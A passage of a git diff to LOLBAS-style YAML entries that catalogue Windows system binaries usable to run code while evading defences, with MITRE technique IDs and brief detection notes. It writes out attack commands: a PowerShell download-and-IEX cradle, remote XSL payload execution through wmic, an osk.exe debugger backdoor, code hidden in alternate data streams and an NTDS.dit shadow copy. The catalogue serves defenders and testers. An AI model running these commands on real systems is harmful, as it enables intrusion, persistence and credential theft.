- Command: Scriptrunner.exe -appvscript calc.exe
Description: Execute calc.exe.
Description: Executes calc.exe
Usecase: Execute binary through proxy binary to evade defensive counter measurments
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Execute the calc.cmd script on the remote share.
Description: Executes calc.cmde from remote server
Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\scriptrunner.exe
- c:\windows\sysWOW64\scriptrunner.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\scriptrunner.exe
- Path: C:\Windows\SysWOW64\scriptrunner.exe
Code Sample:
- Code:
Detection:
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed
Resources:
- https://twitter.com/KyleHanslovan/status/914800377580503040
- https://twitter.com/NickTyrer/status/914234924655312896
- https://github.com/MoooKitty/Code-Execution
Notes: Thanks to Nick Tyrer - @NickTyrer
- Link: https://twitter.com/KyleHanslovan/status/914800377580503040
- Link: https://twitter.com/NickTyrer/status/914234924655312896
- Link: https://github.com/MoooKitty/Code-Execution
Acknowledgement:
- Person: Nick Tyrer
Handle: '@nicktyrer'
---

27
yml/OSBinaries/Syncappvpublishingserver.yml
View File

@ -1,16 +1,27 @@
---
Name: SyncAppvPublishingServer.exe
Description: Execute
Author: ''
Description: Used by App-v to get App-v server lists
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
Description: Example command on how inject Powershell code into the process
Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\System32\SyncAppvPublishingServer.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
Code Sample:
- Code:
Detection:
- IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed
Resources:
- https://twitter.com/monoxgas/status/895045566090010624
Notes: Thanks to Nick Landers - @monoxgas
- Link: https://twitter.com/monoxgas/status/895045566090010624
Acknowledgement:
- Person: Nick Landers
Handle: '@monoxgas'
---

38
yml/OSBinaries/Wab.yml
View File

@ -1,20 +1,28 @@
---
---
Name: Wab.exe
Description: Execute
Author: ''
Description: Windows address book manager
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: Wab.exe
Description: Loads a DLL configured in the registry under HKLM.
- Command: wab.exe
Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice
Usecase: Execute dll file. Bypass defensive counter measures
Category: Execute
Privileges: Administrator
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- 'C:\Program Files\Windows Mail\wab.exe '
- 'C:\Program Files (x86)\Windows Mail\wab.exe '
Code Sample: []
Detection: []
- Path: C:\Program Files\Windows Mail\wab.exe
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
Code Sample:
- Code:
Detection:
- IOC: WAB.exe should normally never be used
Resources:
- http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
- https://twitter.com/Hexacorn/status/991447379864932352
Notes: |
Thanks to Adam - @Hexacorn
Requires registry changes, Requires Administrative Access
- Link: https://twitter.com/Hexacorn/status/991447379864932352
- Link: http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
Acknowledgement:
- Person: Adam
Handle: '@Hexacorn'
---

99
yml/OSBinaries/Wmic.yml
View File

@ -1,46 +1,85 @@
---
Name: WMIC.exe
Description: Reconnaissance, Execute, Read ADS
Author: ''
Name: Wmic.exe
Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: wmic.exe process call create calc
Description: Execute calc.exe.
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS).
- Command: wmic.exe useraccount get /ALL
Description: List the user accounts on the machine.
- Command: wmic.exe process get caption,executablepath,commandline
Description: Gets the command line used to execute a running program.
- Command: wmic.exe qfe get description,installedOn /format:csv
Description: Gets a list of installed Windows updates.
- Command: wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%")
Description: Check to see if the target system is running SQL.
- Command: get-wmiobject class "win32_share" namespace "root\CIMV2" computer "targetname"
Description: Use the PowerShell cmdlet to list the shares on a remote server.
- Command: wmic.exe /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: wmic.exe process call create calc
Description: Execute calc from wmic
Usecase: Execute binary from wmic to evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Description: Execute evil.exe on the remote system.
Usecase: Execute binary on a remote system
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.
Usecase: Execute binary with scheduled task created with wmic on a remote computer
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
Description: Create a volume shadow copy of NTDS.dit that can be copied.
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Description: Execute a script contained in the target .XSL file hosted on a remote server.
- Command: wmic.exe os get /format:"MYXSLFILE.xsl"
Description: Executes JScript or VBScript embedded in the target XSL stylesheet.
Usecase: Execute binary on remote system
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Description: Create a volume shadow copy of NTDS.dit that can be copied.
Usecase: Execute binary on remote system
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
Usecase: Execute script from remote system
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\wbem\wmic.exe
- c:\windows\sysWOW64\wbem\wmic.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\wmic.exe
- Path: C:\Windows\SysWOW64\wmic.exe
Code Sample:
- Code:
Detection:
- IOC: Wmic getting scripts from remote system
Resources:
- https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
- https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
- https://twitter.com/subTee/status/986234811944648707
Notes: Thanks to Casey Smith - @subtee
- Link: https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
- Link: https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
- Link: https://twitter.com/subTee/status/986234811944648707
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

30
yml/OSBinaries/Wscript.yml
View File

@ -1,17 +1,27 @@
---
Name: Wscript.exe
Description: Execute, Read ADS
Author: ''
Description: Used by Windows to execute scripts
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: wscript c:\ads\file.txt:script.vbs
Description: Executes the .VBS script stored as an Alternate Data Stream (ADS).
Description: Execute script stored in an alternate data stream
Usecase: Execute hidden code to evade defensive counter measures
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\wscript.exe
- c:\windows\sysWOW64\wscript.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\wscript.exe
- Path: C:\Windows\SysWOW64\wscript.exe
Code Sample:
- Code:
Detection:
- IOC: Wscript.exe executing code from alternate data streams
Resources:
- '?'
Notes: Thanks to ?
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

34
yml/OSBinaries/Xwizard.yml
View File

@ -1,21 +1,29 @@
---
Name: Xwizard.exe
Description: DLL hijack, Execute
Author: ''
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: xwizard.exe
Description: Xwizard.exe will load a .DLL file located in the same directory (DLL Hijack) named xwizards.dll.
- Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
Description: Xwizard.exe running a custom class that has been added to the registry.
Usecase: Run a com object created in registry to evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\xwizard.exe
- c:\windows\sysWOW32\xwizard.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\xwizard.exe
- Path: C:\Windows\SysWOW64\xwizard.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
- https://www.youtube.com/watch?v=LwDHX7DVHWU
- https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
Notes: Thanks to Adam - @Hexacorn, Nick Tyrer - @nicktyrer
- Link: http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
- Link: https://www.youtube.com/watch?v=LwDHX7DVHWU
- Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
Acknowledgement:
- Person: Adam
Handle: '@Hexacorn'
---